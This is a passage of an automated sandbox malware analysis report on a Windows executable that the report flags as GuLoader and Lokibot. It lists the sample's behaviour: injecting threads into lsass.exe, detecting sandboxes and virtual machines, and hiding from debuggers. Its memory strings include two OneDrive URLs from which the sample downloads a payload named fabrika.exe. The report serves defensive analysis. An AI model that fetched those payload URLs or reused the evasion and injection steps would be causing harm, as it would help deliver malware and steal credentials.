    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292592 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess Stats: CPU usage > 98%
    Source: QVWb1n5OTH.exe, 00000001.00000002.23760107130.00000000023B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAERIFIED.exeFE2X vs QVWb1n5OTH.exe
    Source: QVWb1n5OTH.exe, 00000001.00000002.23758609767.0000000000422000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAERIFIED.exe vs QVWb1n5OTH.exe
    Source: QVWb1n5OTH.exe, 00000004.00000000.23755795559.0000000000422000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAERIFIED.exe vs QVWb1n5OTH.exe
    Source: QVWb1n5OTH.exeBinary or memory string: OriginalFilenameAERIFIED.exe vs QVWb1n5OTH.exe
    Source: QVWb1n5OTH.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeSection loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeSection loaded: edgegdi.dll
    Source: QVWb1n5OTH.exeStatic PE information: invalid certificate
    Source: QVWb1n5OTH.exeVirustotal: Detection: 60%
    Source: QVWb1n5OTH.exeMetadefender: Detection: 28%
    Source: QVWb1n5OTH.exeReversingLabs: Detection: 48%
    Source: QVWb1n5OTH.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Users\user\Desktop\QVWb1n5OTH.exe "C:\Users\user\Desktop\QVWb1n5OTH.exe"
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess created: C:\Users\user\Desktop\QVWb1n5OTH.exe "C:\Users\user\Desktop\QVWb1n5OTH.exe"
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess created: C:\Users\user\Desktop\QVWb1n5OTH.exe "C:\Users\user\Desktop\QVWb1n5OTH.exe"
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile created: C:\Users\user\AppData\Local\Temp\fabrika.exeJump to behavior
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/7@5/1
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
    Source: QVWb1n5OTH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\AERIFIED.pdb source: QVWb1n5OTH.exe
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0040390E push eax; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02280E1C push eax; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02285811 push ss; retf
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02281E62 push edx; iretd
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02282E49 push 0EFDBCC3h; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02280EBB push eax; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02285D3B pushad ; retn 0004h
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02282311 push edx; iretd
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022839A4 pushad ; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022813FC pushad ; ret
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022857C8 push ss; retf
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information set: NOGPFAULTERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=\FABRIKA.EXEHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21122&AUTHKEY=AD5G_LY0IOFLNT4HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21123&AUTHKEY=AKPY_R2RRIXYUL0
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761429475.0000000004FF0000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761429475.0000000004FF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exe TID: 4396Thread sleep time: -780000s >= -30000s
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeThread delayed: delay time: 60000
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeSystem information queried: ModuleInformation
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: lsass.exe, 00000006.00000000.24160521817.000001FB43AA5000.00000004.00000001.sdmpBinary or memory string: pvmicshutdownNT SERVICE
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761429475.0000000004FF0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=\fabrika.exehttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21122&authkey=AD5G_ly0iOflnT4https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21123&authkey=AKpY_r2rRiXyuL0
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: lsass.exe, 00000006.00000000.24160521817.000001FB43AA5000.00000004.00000001.sdmpBinary or memory string: pvmicvssNT SERVICE
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: QVWb1n5OTH.exe, 00000004.00000002.28436450790.000000000079A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW3
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicvss
    Source: QVWb1n5OTH.exe, 00000004.00000002.28435771570.0000000000728000.00000004.00000020.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436450790.000000000079A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: lsass.exe, 00000006.00000000.24160521817.000001FB43AA5000.00000004.00000001.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761429475.0000000004FF0000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: QVWb1n5OTH.exe, 00000001.00000002.23761497673.00000000050B9000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438636102.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
    Source: lsass.exe, 00000006.00000000.24151800082.000001FB43A13000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28435910128.000001FB43A13000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168391718.000001FB43A13000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292A99 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228C2B2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02290086 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02290FA8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228DAFD LdrInitializeThunk,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022942DB LoadLibraryA,RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Writes to foreign memory regionsShow sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeMemory written: C:\Windows\System32\lsass.exe base: 1FB439D0000
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeMemory written: C:\Windows\System32\lsass.exe base: 1FB441D0000
    Allocates memory in foreign processesShow sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1FB439D0000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1FB441D0000 protect: page execute and read and write
    Creates a thread in another existing process (thread injection)Show sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeThread created: C:\Windows\System32\lsass.exe EIP: 439D0000
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeProcess created: C:\Users\user\Desktop\QVWb1n5OTH.exe "C:\Users\user\Desktop\QVWb1n5OTH.exe"
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438094073.0000000001000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438094073.0000000001000000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438094073.0000000001000000.00000002.00020000.sdmpBinary or memory string: ZProgram Manager
    Source: QVWb1n5OTH.exe, 00000004.00000002.28438094073.0000000001000000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information:

    barindex
    Yara detected LokibotShow sources
    Source: Yara matchFile source: Process Memory Space: QVWb1n5OTH.exe PID: 7056, type: MEMORYSTR
    GuLoader behavior detectedShow sources
    Source: Initial fileSignature Results: GuLoader behavior
    Tries to harvest and steal browser information (history, passwords, etc)Show sources
